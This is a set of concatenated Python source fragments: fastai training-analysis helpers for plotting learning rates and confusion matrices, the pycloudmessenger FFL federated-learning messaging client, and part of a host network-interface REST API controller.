          **kwargs)->Optional[plt.Figure]:
    "Plot learning rate and losses, trimmed between `skip_start` and `skip_end`. Optionally plot and return min gradient"
    lrs = self._split_list(self.lrs, skip_start, skip_end)
    losses = self._split_list(self.losses, skip_start, skip_end)
    losses = [x.item() for x in losses]
    # all_losses holds the raw curve and (optionally) its smoothed version.
    all_losses = [losses]
    #if 'k' in kwargs: losses = self.smoothen_by_spline(lrs, losses, **kwargs)
    fig, ax = plt.subplots(1,1)
    ax.plot(lrs, losses)
    if win is not None:
        # Overlay a sliding-window-smoothed loss curve in green.
        losses2 = my_smooth(losses, w=win)
        all_losses.append(losses2)
        ax.plot(lrs, losses2, 'g', lw=0.5)
    ax.set_ylabel("Loss")
    ax.set_xlabel("Learning Rate")
    ax.set_xscale('log')
    ax.xaxis.set_major_formatter(plt.FormatStrFormatter('%.0e'))
    if suggestion:
        # Mark the min-gradient point on both curves; i == 0 is the raw one.
        for i, l in enumerate(all_losses):
            tag = '' if i == 0 else ' (smoothed)'
            try: mg = (np.gradient(np.array(l))).argmin()
            except:
                print(f"Failed to compute the gradients{tag}, there might not be enough points.")
                return
            print(f"Min numerical gradient: {lrs[mg]:.2E} {tag}")
            color = 'r' if i == 0 else 'g'
            ax.plot(lrs[mg],losses[mg],markersize=10,marker='o',color=color)
            if i == 0:
                self.min_grad_lr = lrs[mg]
                # Also mark the min-loss point and the min-loss/10 heuristic.
                ml = np.argmin(l)
                ax.plot(lrs[ml],losses[ml],markersize=8,marker='o',color='k')
                print(f"Min loss divided by 10: {lrs[ml]/10:.2E}")
                ax.plot([lrs[ml]/10, lrs[ml]/10], [np.min(l), np.max(l)], 'k--', alpha=0.5)
                #print(np.min(l), np.max(l))
            elif i == 1:
                self.min_grad_lr_smoothed = lrs[mg]
    if ifnone(return_fig, defaults.return_fig): return fig
    try:
        if not IN_NOTEBOOK: plot_sixel(fig)
    except: pass
# Attach as a method so `recorder.plot2(...)` is available.
Recorder.plot2 = plot2
def threshold_confusion_matrix(interp, thresh=0):
    """Confusion matrix over predictions whose top probability reaches
    `thresh`; rows are actual classes, columns are predicted classes."""
    probs = to_np(interp.preds)
    actual = to_np(interp.y_true)
    n_classes = probs.shape[1]
    matrix = np.zeros((n_classes, n_classes), dtype=np.int64)
    for sample_idx, row in enumerate(probs):
        predicted = np.argmax(row)
        if row[predicted] >= thresh:
            matrix[actual[sample_idx], predicted] += 1
    return matrix
# fixed version -- consider submitting PR
def plot_confusion_matrix_thresh(self, normalize:bool=False, title:str='Confusion matrix', cmap:Any="Blues", slice_size:int=1,
                                 thresh:float=0.0,
                                 norm_dec:int=2, plot_txt:bool=True, return_fig:bool=None, **kwargs)->Optional[plt.Figure]:
    "Plot the confusion matrix, with `title` and using `cmap`."
    # This function is mainly copied from the sklearn docs
    # thresh > 0 selects the confidence-filtered matrix instead of fastai's.
    if thresh == 0:
        cm = self.confusion_matrix(slice_size=slice_size)
    else:
        cm = threshold_confusion_matrix(self, thresh=thresh)
    if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
    fig = plt.figure(**kwargs)
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    tick_marks = np.arange(self.data.c)
    plt.xticks(tick_marks, self.data.y.classes, rotation=90)
    plt.yticks(tick_marks, self.data.y.classes, rotation=0)
    if plot_txt:
        # NOTE(review): `thresh` is reused here as the text-color cutoff,
        # clobbering the probability-threshold parameter; harmless since the
        # parameter is no longer needed past this point, but confusing.
        thresh = cm.max() / 2.
        for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
            coeff = f'{cm[i, j]:.{norm_dec}f}' if normalize else f'{cm[i, j]}'
            plt.text(j, i, coeff, horizontalalignment="center", verticalalignment="center", color="white" if cm[i, j] > thresh else "black")
    # Work-around: restore y-limits that newer matplotlib versions clip.
    plt.ylim(-0.5, self.data.c-0.5)
    plt.tight_layout()
    plt.ylabel('Actual')
    plt.xlabel('Predicted')
    plt.grid(False)
    if ifnone(return_fig, defaults.return_fig): return fig
# work-around version
def plot_confusion_matrix(interp, *args, **kwargs):
    """Work-around wrapper: delegate to the interpreter's own plotter, then
    restore the y-limits that newer matplotlib versions clip."""
    interp.plot_confusion_matrix(*args, **kwargs)
    upper = interp.data.c - 0.5
    plt.ylim(-0.5, upper)
def _summarize_cm(cm, classes):
n = len(classes)
print(f'{" "*10} Precision')
print(f'{" "*10} Specificity Recall Sensitivity F1')
total = np.sum(cm)
for i, c in enumerate(classes):
predicted = np.sum(cm[:, i])
actual = np.sum(cm[i, :])
TP = cm[i,i]
FP = predicted - TP
TN = total - actual - predicted + TP
all_actual_neg = total - actual
precision = TP/predicted
recall = TP/actual
sensitivity = TN/all_actual_neg
F1 = scipy.stats.hmean([precision, recall])
print(f'{c:10} {" "*3} {100*precision:3.0f}% {" "*6} {100*recall:3.0f}% {" "*6}' +
f'{100*sensitivity:3.0f}% {" "*6} {F1:3.2f}')
def _consolidate_cm(cm, groupings, class_map):
"""consolidate confusion matrix by combining class groups"""
# Group anong first axis
cons = []
for group, members in groupings.items():
members = members if isinstance(members, (list, tuple)) else [members]
cons.append(np.sum([cm[class_map[m],:] for m in members], axis=0))
cons = np.stack(cons)
# group along second axis
grouped_cm = []
for group, members in groupings.items():
members = members if isinstance(members, (list, tuple)) else [members]
grouped_cm.append(np.sum([cons[:,class_map[m]] for m in members], axis=0))
grouped_cm = np.stack(grouped_cm).T
return grouped_cm
def interpretation_summary(interp, groupings=None, strict=False, thresh:float=0.0):
    """Print per-class stats, optional group-level stats, and overall accuracy.

    A non-zero `thresh` restricts the matrix to confident predictions.
    (`strict` is accepted for interface compatibility but unused.)
    """
    if thresh == 0:
        cm = interp.confusion_matrix()
    else:
        cm = threshold_confusion_matrix(interp, thresh=thresh)
    _summarize_cm(cm, interp.data.classes)
    if isinstance(groupings, dict):
        index_of = {name: idx for idx, name in enumerate(interp.data.classes)}
        grouped = _consolidate_cm(cm, groupings, index_of)
        print('\nSummary by group')
        _summarize_cm(grouped, list(groupings.keys()))
        print('\n')
    _get_accuracy(cm)
def _get_accuracy(cm, do_print=True):
total = np.sum(cm)
TP = np.sum([cm[i,i] for i in range(len(cm))])
acc = float(TP)/total
if do_print:
print(f'Overall Accuracy: {acc*100:3.2f}%')
else:
return acc
def get_accuracy(interp, do_print=True):
    """Compute (and optionally print) overall accuracy from the
    interpreter's confusion matrix.

    Fix: the original computed the value but never returned it, so
    `get_accuracy(interp, do_print=False)` always yielded None.
    """
    cm = interp.confusion_matrix()
    return _get_accuracy(cm, do_print=do_print)
def analyze_confidence(interp, thresh = 0.0, do_plot=True, plot_args={'figsize':(10, 5)}, return_raw=False):
    # NOTE(review): mutable default `plot_args` is shared across calls;
    # harmless here because it is only read, never mutated.
    p = to_np(interp.preds)
    y_true = to_np(interp.y_true)
    # Top-1 probabilities of the correctly / incorrectly classified samples
    # whose confidence exceeds `thresh`.
    all_correct = [p[j, i] for j in range(len(y_true)) for i in [np.argmax(p[j])]
                   if i ==y_true[j] and p[j, i] > thresh]
    all_wrong = [p[j, i] for j in range(len(y_true)) for i in [np.argmax(p[j])]
                 if i !=y_true[j] and p[j, i] > thresh]
    total_predicted = len(all_correct) + len(all_wrong)
    acc = len(all_correct) / total_predicted
    # Samples below the threshold count as "unknown" (withheld predictions).
    missing = len(y_true) - total_predicted
    pct_unknown = missing / len(y_true)
    if do_plot and not return_raw:
        # 2x2 grid of confidence histograms: stacked correct+incorrect and
        # incorrect-only, each in linear and log scale.
        print(f'Accuracy: {100*acc:3.2f}% Error: {100*(1-acc):3.2f}% Unknown: {100*pct_unknown:3.2f}% @ Threshold: {thresh:0.2f}')
        print('')
        colors = ['green', 'red']
        print(f'Confidence Histograms @ t={thresh}')
        fig, axs = plt.subplots(2, 2, **plot_args)
        ax = axs[0, 0]
        ax.tick_params(axis='both', which='major', labelsize=7)
        ax.set_title(f'Correct & Incorrect')
        ax.hist([all_correct, all_wrong], range=(0,1), bins=20, stacked=True, color=colors)
        ax.set_xlim(thresh, 1)
        ax = axs[0, 1]
        ax.tick_params(axis='both', which='major', labelsize=7)
        ax.set_title(f'Incorrect Only')
        ax.hist(all_wrong, range=(0,1), bins=20, color=colors[1])
        ax.set_xlim(thresh, 1)
        ax = axs[1, 0]
        ax.tick_params(axis='both', which='major', labelsize=7)
        ax.set_title(f'Log Correct & Incorrect')
        ax.hist([all_correct, all_wrong], range=(0,1), bins=20, log=True, stacked=True, color=colors)
        ax.set_xlim(thresh, 1)
        ax = axs[1, 1]
        ax.tick_params(axis='both', which='major', labelsize=7)
        ax.set_title(f'Log Incorrect Only')
        ax.hist(all_wrong, range=(0,1), bins=20, log=True, color=colors[1])
        ax.set_xlim(thresh, 1)
        fig.tight_layout()
        plt.show()
    elif return_raw:
        # Raw counts: (predicted, correct, wrong, withheld).
        return total_predicted, len(all_correct), len(all_wrong), missing
    else:
        return acc, pct_unknown
def accuracy_vs_threshold(interp, threshold_range=(0, 0.90, 18), plot_args={'figsize':(8, 2)}):
    # Sweep confidence thresholds and plot the error rate and the fraction
    # of withheld (unknown) predictions against the threshold.
    t_range = np.linspace(*threshold_range)
    # Each row of `results` is (accuracy, pct_unknown) from analyze_confidence.
    results = np.array([analyze_confidence(interp, thresh=t, do_plot=False) for t in t_range])
    fig, axs = plt.subplots(1, 2, **plot_args)
    ax = axs[0]
    ax.set_title('Error Rate vs Threshold')
    ax.plot(t_range, 1 - results[:, 0])
    ax.minorticks_on()
    ax.grid(which='major', linestyle='-', linewidth='0.5', color='red')
    ax.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
    ax = axs[1]
    ax.set_title('Witheld Predictions vs Threshold')
    ax.plot(t_range, results[:, 1])
    ax.minorticks_on()
    ax.grid(which='major', linestyle='-', linewidth='0.5', color='red')
    ax.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
    fig.tight_layout()
    plt.show()
def show_incremental_accuracy(interp, plot_args={'figsize':(8,3)}):
    # For each threshold bucket, plot the accuracy of just the predictions
    # that fall into that confidence band (incremental accuracy), plus the
    # total predicted fraction as the threshold rises.
    all_thresholds = np.linspace(0, 0.99, 25)
    # Rows: (total_predicted, correct, wrong, missing) per threshold.
    results = np.array([analyze_confidence(interp, thresh=t, return_raw=True) for t in all_thresholds])
    all_predicted, all_correct, all_wrong,all_missing = results[:, 0], results[:, 1], results[:, 2], results[:, 3],
    # Per-band deltas between consecutive thresholds.
    d_predicted, d_correct, d_wrong, d_missing = -np.diff(results[:, 0]), -np.diff(results[:, 1]), -np.diff(results[:, 2]), np.diff(results[:, 3])
    fig, axs = plt.subplots(1, 2, **plot_args)
    ax = axs[0]
    ax.set_title('Incremental Accuracy vs Threshold')
    # Only show bands with at least 10 predictions to avoid noisy ratios.
    ax.scatter([np.mean(all_thresholds[i:i+1]) for i, p in enumerate(d_predicted) if p >= 10],
               [d_correct[i]/p for i, p in enumerate(d_predicted) if p >= 10], s=10)
    ax.set_xlim(0, 1)
    ax.set_ylim(0, 1)
    ax.set_xlabel('Threshold')
    ax.set_ylabel('Incremental Accuracy')
    ax = axs[1]
    ax.set_title('Total Predicted vs Threshold')
    ax.plot([all_thresholds[i] for i, p in enumerate(all_predicted)],
            [p/all_predicted[0] for i, p in enumerate(all_predicted)])
    ax.set_xlim(0, 1)
    ax.set_ylim(0, 1)
    ax.set_xlabel('Threshold')
    ax.set_ylabel('Predicted')
    fig.tight_layout()
    plt.show()
def old_analyze_low_confidence(interp, thresh=0.0, thresh_min=0.0, display_mode='delta'):
assert display_mode in ['delta', 'index', 'prediction']
p = to_np(interp.preds)
y_true = to_np(interp.y_true)
wrong = [(j,p[j, i], p[j, y_true[j]], p[j, i]-p[j, y_true[j]] ) for j in range(len(y_true)) for i in [np.argmax(p[j])]
if i !=y_true[j] and p[j, i] < thresh and p[j, i] >= thresh_min]
med_delta = np.median([w[3] for w in wrong])
print(f'Total predictions in range: {len(wrong)} Median delta: {med_delta:3.2f}')
if display_mode == 'index':
print('\nLow Confidence Predictions sorted by image number')
elif display_mode | |
<filename>pycloudmessenger/ffl/fflapi.py<gh_stars>0
#!/usr/bin/env python3
#author <EMAIL>
"""FFL protocol handler.
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
Please note that the following code was developed for the project MUSKETEER
in DRL funded by the European Union under the Horizon 2020 Program.
"""
# pylint: disable=R0903, R0913
import json
import logging
from enum import Enum
import requests
import pycloudmessenger.utils as utils
import pycloudmessenger.rabbitmq as rabbitmq
import pycloudmessenger.serializer as serializer
import pycloudmessenger.ffl.message_catalog as catalog
logging.getLogger("pika").setLevel(logging.WARNING)
class Topology(str, Enum):
    """Task topologies supported by the FFL service."""

    star = "STAR"

    def __str__(self) -> str:
        # Render as the raw wire value rather than `Topology.star`.
        return self.value
class Notification(str, Enum):
    '''Notifications that can be received from the FFL service.'''
    aggregator_started = 'aggregator_started'
    aggregator_stopped = 'aggregator_stopped'
    participant_joined = 'participant_joined'
    participant_updated = 'participant_updated'
    participant_left = 'participant_left'

    @classmethod
    def is_notification(cls, msg: dict, notification) -> bool:
        '''is_notification
        Check whether `msg` carries the given notification type.
        returns: True if yes, False otherwise (including malformed messages)
        '''
        try:
            ntype = msg['notification']['type']
            return cls(ntype) is notification
        except (KeyError, TypeError, ValueError):
            # Missing keys, non-dict payloads, or unrecognised notification
            # names all simply mean "not this notification". The original
            # bare `except:` also swallowed e.g. KeyboardInterrupt.
            pass
        return False

    @classmethod
    def is_aggregator_started(cls, msg: dict) -> bool:
        '''is_aggregator_started
        returns: True, if msg is an aggregator started notification, False otherwise
        '''
        return cls.is_notification(msg, cls.aggregator_started)

    @classmethod
    def is_aggregator_stopped(cls, msg: dict) -> bool:
        '''is_aggregator_stopped
        returns: True, if msg is an aggregator stopped notification, False otherwise
        '''
        return cls.is_notification(msg, cls.aggregator_stopped)

    @classmethod
    def is_participant_joined(cls, msg: dict) -> bool:
        '''is_participant_joined
        returns: True, if msg is a participant joined notification, False otherwise
        '''
        return cls.is_notification(msg, cls.participant_joined)

    @classmethod
    def is_participant_left(cls, msg: dict) -> bool:
        '''is_participant_left
        returns: True, if msg is a participant left notification, False otherwise
        '''
        return cls.is_notification(msg, cls.participant_left)

    @classmethod
    def is_participant_updated(cls, msg: dict) -> bool:
        '''is_participant_updated
        returns: True, if msg is a participant updated notification, False otherwise
        '''
        return cls.is_notification(msg, cls.participant_updated)

    def __str__(self):
        # Render as the raw wire value.
        return self.value
class Context(rabbitmq.RabbitContext):
    '''Holds connection details for an FFL service (inherits everything
    from rabbitmq.RabbitContext; exists to give the FFL API its own name).'''
class TimedOutException(rabbitmq.RabbitTimedOutException):
    '''Over-ride exception: FFL-level alias for a RabbitMQ receive timeout.'''
class ConsumerException(rabbitmq.RabbitConsumerException):
    '''Over-ride exception: FFL-level alias for a RabbitMQ consumer error.'''
class Messenger(rabbitmq.RabbitDualClient):
'''Communicates with an FFL service'''
def __init__(self, context: Context, publish_queue: str = None,
subscribe_queue: str = None, max_msg_size: int = 2*1024*1024):
'''Class initializer'''
super(Messenger, self).__init__(context)
#Max size of a message for dispatch
self.max_msg_size = max_msg_size
#Keep a copy here - lots of re-use
self.timeout = context.timeout()
if not publish_queue:
#Publish not over-ridden so use context version
publish_queue = context.feeds()
self.start_subscriber(queue=rabbitmq.RabbitQueue(subscribe_queue))
self.start_publisher(queue=rabbitmq.RabbitQueue(publish_queue))
#Initialise the catalog with the target subscribe queue
self.catalog = catalog.MessageCatalog(context.user(), self.get_subscribe_queue())
def __enter__(self):
return self
def __exit__(self, *args):
self.stop()
def _send(self, message: dict, queue: str = None) -> dict:
'''
Send a message and return immediately
Throws: An exception on failure
Returns: dict
'''
message = serializer.Serializer.serialize(message)
if len(message) > self.max_msg_size:
raise BufferError(f"Messenger: payload too large: {len(message)}.")
pub_queue = rabbitmq.RabbitQueue(queue) if queue else None
super(Messenger, self).send_message(message, pub_queue)
def receive(self, timeout: int = 0) -> dict:
'''
Wait for timeout seconds for a message to arrive
Throws: An exception on failure
Returns: dict
'''
if not timeout:
timeout = self.timeout
try:
super(Messenger, self).receive_message(self.internal_handler, timeout, 1)
except rabbitmq.RabbitTimedOutException as exc:
raise TimedOutException(exc) from exc
except rabbitmq.RabbitConsumerException as exc:
raise ConsumerException(exc) from exc
return serializer.Serializer.deserialize(self.last_recv_msg)
def _invoke_service(self, message: dict, timeout: int = 0) -> dict:
'''
Send a message and wait for a reply
Throws: An exception on failure
Returns: dict
'''
result = None
if not timeout:
timeout = self.timeout
try:
message = serializer.Serializer.serialize(message)
if len(message) > self.max_msg_size:
raise BufferError(f"Messenger: payload too large: {len(message)}.")
result = super(Messenger, self).invoke_service(message, timeout)
except rabbitmq.RabbitTimedOutException as exc:
raise TimedOutException(exc) from exc
except rabbitmq.RabbitConsumerException as exc:
raise ConsumerException(exc) from exc
if not result:
raise Exception(f"Malformed object: None")
result = serializer.Serializer.deserialize(result)
if 'error' in result:
raise Exception(result['error'])
if 'calls' not in result:
raise Exception(f"Malformed object: {result}")
results = result['calls'][0]['count'] #calls[0] will always succeed
return result['calls'][0]['data'] if results else None
def _dispatch_model(self, model: dict = None) -> dict:
'''
Dispatch a model and determine its download location
Throws: An exception on failure
Returns: dict
'''
if not model:
return {}
#First, obtain the upload location/keys
message = self.catalog.msg_bin_uploader()
upload_info = self._invoke_service(message)
#And then perform the upload
response = requests.post(
upload_info['url'],
files={'file': json.dumps(model)},
data=upload_info['fields'],
headers=None)
if not response.ok:
raise Exception(f'Upload Error: {response.status_code}')
if 'key' not in upload_info['fields']:
raise Exception('Malformed URL.')
#Now obtain the download location/keys
message = self.catalog.msg_bin_downloader(upload_info['fields']['key'])
download_info = self._invoke_service(message)
return {'url': download_info}
######## Public methods
def user_create(self, user_name: str, password: str, organisation: str) -> dict:
'''
Register as a new user on the platformr
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_user_create(user_name, password, organisation)
return self._invoke_service(message)
def user_assignments(self) -> dict:
'''
Return all tasks joined by the current user
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_user_assignments()
return self._invoke_service(message)
def task_assignment_info(self, task_name: str) -> dict:
'''
As a task participant, get my participation details
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_assignment_info(task_name)
message = self._invoke_service(message)
return message[0]
def task_assignment_join(self, task_name: str) -> dict:
'''
As a potential task participant, try to join the task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_join(task_name)
message = self._invoke_service(message)
return message[0]
def task_assignment_update(self, task_name: str, model: dict = None) -> None:
'''
Sends an update, including a model dict, no reply wanted
Throws: An exception on failure
Returns: Nothing
'''
model_message = self._dispatch_model(model)
message = self.catalog.msg_task_assignment_update(
task_name, model=model_message)
self._send(message)
def task_assignment_wait(self, timeout: int = 0) -> dict:
'''
Wait for a message, until timeout seconds
Throws: An exception on failure
Returns: dict
'''
return self.receive(timeout)
def task_assignments(self, task_name: str) -> dict:
'''
Return all assignments for the owned task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_assignments(task_name)
return self._invoke_service(message)
def task_listing(self) -> dict:
'''
Return a list of all tasks available
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_listing()
return self._invoke_service(message)
def task_create(self, task_name: str, topology: str, definition: dict) -> dict:
'''
A new task created by the current user
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_create(task_name, topology, definition)
message = self._invoke_service(message)
return message[0]
def task_update(self, task_name: str, status: str, topology: str = None,
                definition: dict = None) -> dict:
    '''
    Change task details
    Throws: An exception on failure
    Returns: dict
    '''
    # NOTE(review): the catalog call takes (task_name, topology, definition,
    # status) -- a different ordering than this method's parameters; confirm
    # it matches msg_task_update's signature.
    message = self.catalog.msg_task_update(task_name, topology, definition, status)
    return self._invoke_service(message)
def task_info(self, task_name: str) -> dict:
    '''
    Return info on a task
    Throws: An exception on failure
    Returns: dict
    '''
    # The service replies with a list; the first element holds the info.
    reply = self._invoke_service(self.catalog.msg_task_info(task_name))
    return reply[0]
def task_quit(self, task_name: str) -> dict:
    '''
    As a task participant, leave the task
    Throws: An exception on failure
    Returns: dict
    '''
    return self._invoke_service(self.catalog.msg_task_quit(task_name))
def task_start(self, task_name: str, model: dict = None) -> None:
    '''
    As a task owner, start the task
    Throws: An exception on failure
    Returns: Nothing
    '''
    # Upload/serialize the optional model, then fire-and-forget the message.
    payload = self.catalog.msg_task_start(
        task_name, self._dispatch_model(model))
    self._send(payload)
def task_stop(self, task_name: str) -> None:
    '''
    As a task owner, stop the task
    Throws: An exception on failure
    Returns: Nothing
    '''
    # Fire-and-forget: uses _send() rather than _invoke_service(), so no
    # reply is returned (the original docstring incorrectly said "dict").
    message = self.catalog.msg_task_stop(task_name)
    self._send(message)
class BasicParticipant():
'''Base class for an FFL user/participant'''
def __init__(self, context: Context, task_name: str = None,
             download_models: bool = True):
    '''
    Class initializer

    :param context: connection credentials/configuration; required
    :param task_name: task this participant is associated with, if any
    :param download_models: when True, referenced models are downloaded
    Throws: An exception on failure
    Returns: BasicParticipant
    '''
    if not context:
        raise Exception('Credentials must be specified.')
    # Messenger/queue are created lazily (presumably in connect()) --
    # confirm against the connect() implementation.
    self.messenger = None
    # List of messages/models downloaded
    self.model_files = []
    self.context = context
    self.task_name = task_name
    self.queue = None
    self.download = download_models
def __enter__(self):
    '''
    Context manager enters - call connect
    Throws: An exception on failure
    Returns: self
    '''
    # connect() is expected to return self so `with` binds the participant.
    return self.connect()
def __exit__(self, *args):
'''
Context manager exits - call close
Throws: An | |
None
for p in patch:
if '/ifclass' == p['path']:
temp_interface['ifclass'] = p['value']
elif '/sriov_numvfs' == p['path']:
sriov_numvfs = p['value']
temp_interface['sriov_numvfs'] = sriov_numvfs
elif '/sriov_vf_driver' == p['path']:
sriov_vf_driver = p['value']
temp_interface['sriov_vf_driver'] = sriov_vf_driver
# If the interface class is no longer pci-sriov, reset the VF
# parameters if they haven't been specified in the patch
if temp_interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV:
if sriov_numvfs is None:
temp_interface['sriov_numvfs'] = 0
if sriov_vf_driver is None:
temp_interface['sriov_vf_driver'] = None
sriov_update = _check_interface_sriov(temp_interface.as_dict(), ihost)
# Get the ethernet port associated with the interface if network type
# is changed
interface_ports = pecan.request.dbapi.ethernet_port_get_by_interface(
rpc_interface.uuid)
for p in interface_ports:
if p is not None:
ports = p.name
break
# Process updates
vlan_id = None
delete_addressing = False
for p in patch:
if '/vlan_id' in p['path']:
# Update vlan_id to the new value
if rpc_interface['vlan_id']:
if int(p['value']) != int(rpc_interface['vlan_id']):
vlan_id = p['value']
temp_interface['vlan_id'] = vlan_id
_check_interface_vlan_id("modify", temp_interface.as_dict(), ihost)
# replace ihost_uuid and iinterface_uuid with corresponding
patch_obj = jsonpatch.JsonPatch(patch)
for p in patch_obj:
if p['path'] == '/ihost_uuid':
p['path'] = '/forihostid'
ihost = objects.host.get_by_uuid(pecan.request.context,
p['value'])
p['value'] = ihost.id
try:
interface = Interface(**jsonpatch.apply_patch(
rpc_interface.as_dict(),
patch_obj)).as_dict()
except utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
# if the aemode is changed adjust the txhashpolicy if necessary
if interface['aemode'] == constants.AE_MODE_ACTIVE_STANDBY:
interface['txhashpolicy'] = None
if (not interface['ifclass'] or
interface['ifclass'] == constants.INTERFACE_CLASS_NONE):
# If the interface class is reset, make sure any network
# specific fields are reset as well
interface['sriov_numvfs'] = 0
interface['sriov_vf_driver'] = None
interface['ipv4_mode'] = None
interface['ipv6_mode'] = None
delete_addressing = True
else:
# Otherwise make sure that appropriate defaults are set.
interface = _set_defaults(interface)
# clear address pool values if address mode no longer set to pool
if interface['ipv4_mode'] != constants.IPV4_POOL:
interface['ipv4_pool'] = None
if interface['ipv6_mode'] != constants.IPV6_POOL:
interface['ipv6_pool'] = None
interface = _check("modify", interface,
ports=ports, ifaces=uses,
existing_interface=rpc_interface.as_dict())
# Clear the vf fields if class is not sriov
if interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV:
interface["sriov_numvfs"] = 0
interface["sriov_vf_driver"] = None
if uses:
# Update MAC address if uses list changed
interface = set_interface_mac(ihost, interface)
update_upper_interface_macs(ihost, interface)
if ports:
_update_ports("modify", rpc_interface, ihost, ports)
if (not interface['ifclass'] or
interface['ifclass'] == constants.NETWORK_TYPE_NONE):
ifclass = None
else:
ifclass = interface['ifclass']
orig_ifclass = rpc_interface['ifclass']
if (not ifclass and
orig_ifclass == constants.INTERFACE_CLASS_PLATFORM):
if _is_interface_network_assigned(interface,
constants.NETWORK_TYPE_MGMT):
# Remove mgmt address associated with this interface
pecan.request.rpcapi.mgmt_ip_set_by_ihost(
pecan.request.context,
ihost['uuid'],
interface['id'],
None)
if delete_addressing:
for family in constants.IP_FAMILIES:
_delete_addressing(interface, family, rpc_interface)
else:
if _is_ipv4_address_mode_updated(interface, rpc_interface):
_update_ipv4_address_mode(interface)
if _is_ipv6_address_mode_updated(interface, rpc_interface):
_update_ipv6_address_mode(interface)
saved_interface = copy.deepcopy(rpc_interface)
try:
# Update only the fields that have changed
for field in objects.interface.fields:
if field in rpc_interface.as_dict():
if rpc_interface[field] != interface[field]:
rpc_interface[field] = interface[field]
rpc_interface.save()
# Re-read from the DB to populate extended attributes
new_interface = objects.interface.get_by_uuid(
pecan.request.context, rpc_interface.uuid)
# Update the MTU of underlying interfaces of an AE
if new_interface['iftype'] == constants.INTERFACE_TYPE_AE:
for ifname in new_interface['uses']:
_update_interface_mtu(ifname, ihost, new_interface['imtu'])
# Restore the default MTU for removed AE members
old_members = set(saved_interface['uses'])
new_members = set(new_interface['uses'])
removed_members = old_members - new_members
for ifname in removed_members:
_update_interface_mtu(ifname, ihost, DEFAULT_MTU)
if sriov_update:
pecan.request.rpcapi.update_sriov_config(
pecan.request.context,
ihost['uuid'])
return Interface.convert_with_links(new_interface)
except Exception as e:
LOG.exception(e)
msg = _("Interface update failed: host %s if %s : patch %s"
% (ihost['hostname'], interface['ifname'], patch))
raise wsme.exc.ClientSideError(msg)
@cutils.synchronized(LOCK_NAME)
@wsme_pecan.wsexpose(None, types.uuid, status_code=204)
def delete(self, interface_uuid):
    """Delete a interface.

    :param interface_uuid: UUID of the interface to remove
    :raises OperationNotPermitted: when accessed via the nested
        /ihosts/... route instead of the top-level interface route
    """
    if self._from_ihosts:
        raise exception.OperationNotPermitted
    interface = objects.interface.get_by_uuid(pecan.request.context,
                                              interface_uuid)
    # _delete() operates on a plain dict, not the RPC object.
    interface = interface.as_dict()
    _delete(interface)
##############
# UTILS
##############
def _dynamic_address_allocation():
    # Returns the management network's 'dynamic' flag, i.e. whether
    # addresses on the mgmt network are allocated dynamically.
    mgmt_network = pecan.request.dbapi.network_get_by_type(
        constants.NETWORK_TYPE_MGMT)
    return mgmt_network.dynamic
def _set_address_family_defaults_by_pool(defaults, pool_type):
    # Choose ipv4/ipv6 mode defaults based on the address family of the
    # pool backing the given network type: the matching family defaults
    # to static addressing, the other one to disabled.
    network = pecan.request.dbapi.network_get_by_type(pool_type)
    pool = pecan.request.dbapi.address_pool_get(network.pool_uuid)
    is_ipv4 = (pool.family == constants.IPV4_FAMILY)
    defaults['ipv4_mode'] = (constants.IPV4_STATIC if is_ipv4
                             else constants.IPV4_DISABLED)
    defaults['ipv6_mode'] = (constants.IPV6_DISABLED if is_ipv4
                             else constants.IPV6_STATIC)
def _set_defaults(interface):
    """Return a copy of *interface* with None-valued known fields replaced
    by their class-dependent defaults. Only keys already present in the
    interface dict are filled in; the input dict is not modified."""
    defaults = {'imtu': DEFAULT_MTU,
                'aemode': constants.AE_MODE_ACTIVE_STANDBY,
                'txhashpolicy': None,
                'primary_reselect': None,
                'vlan_id': None,
                'sriov_numvfs': 0,
                'sriov_vf_driver': None,
                'ptp_role': constants.INTERFACE_PTP_ROLE_NONE,
                'max_tx_rate': None}
    ifclass = interface['ifclass']
    if ifclass == constants.INTERFACE_CLASS_DATA:
        # Data interfaces default to disabled address modes.
        defaults['ipv4_mode'] = constants.IPV4_DISABLED
        defaults['ipv6_mode'] = constants.IPV6_DISABLED
    elif ifclass == constants.INTERFACE_CLASS_PLATFORM:
        defaults['ipv4_mode'] = None
        defaults['ipv6_mode'] = None
    merged = interface.copy()
    for key, value in merged.items():
        if value is None and key in defaults:
            merged[key] = defaults[key]
    return merged
def _check_interface_vlan_id(op, interface, ihost, from_profile=False):
    """Validate that a supplied vlan_id is an integer in [1, 4094].

    Mutates and returns the interface dict; raises ClientSideError on
    invalid values.
    """
    # Check vlan_id
    if 'vlan_id' in interface.keys() and interface['vlan_id'] is not None:
        if not str(interface['vlan_id']).isdigit():
            raise wsme.exc.ClientSideError(_("VLAN id is an integer value."))
        interface['vlan_id'] = int(interface['vlan_id'])
        if interface['vlan_id'] < 1 or interface['vlan_id'] > 4094:
            raise wsme.exc.ClientSideError(_("VLAN id must be between 1 and 4094."))
        else:
            # A valid id is deliberately stored back as text -- presumably
            # for consistency with values coming from the REST patch;
            # confirm callers expect a string here.
            interface['vlan_id'] = six.text_type(interface['vlan_id'])
    return interface
def _check_interface_name(op, interface, ihost, from_profile=False):
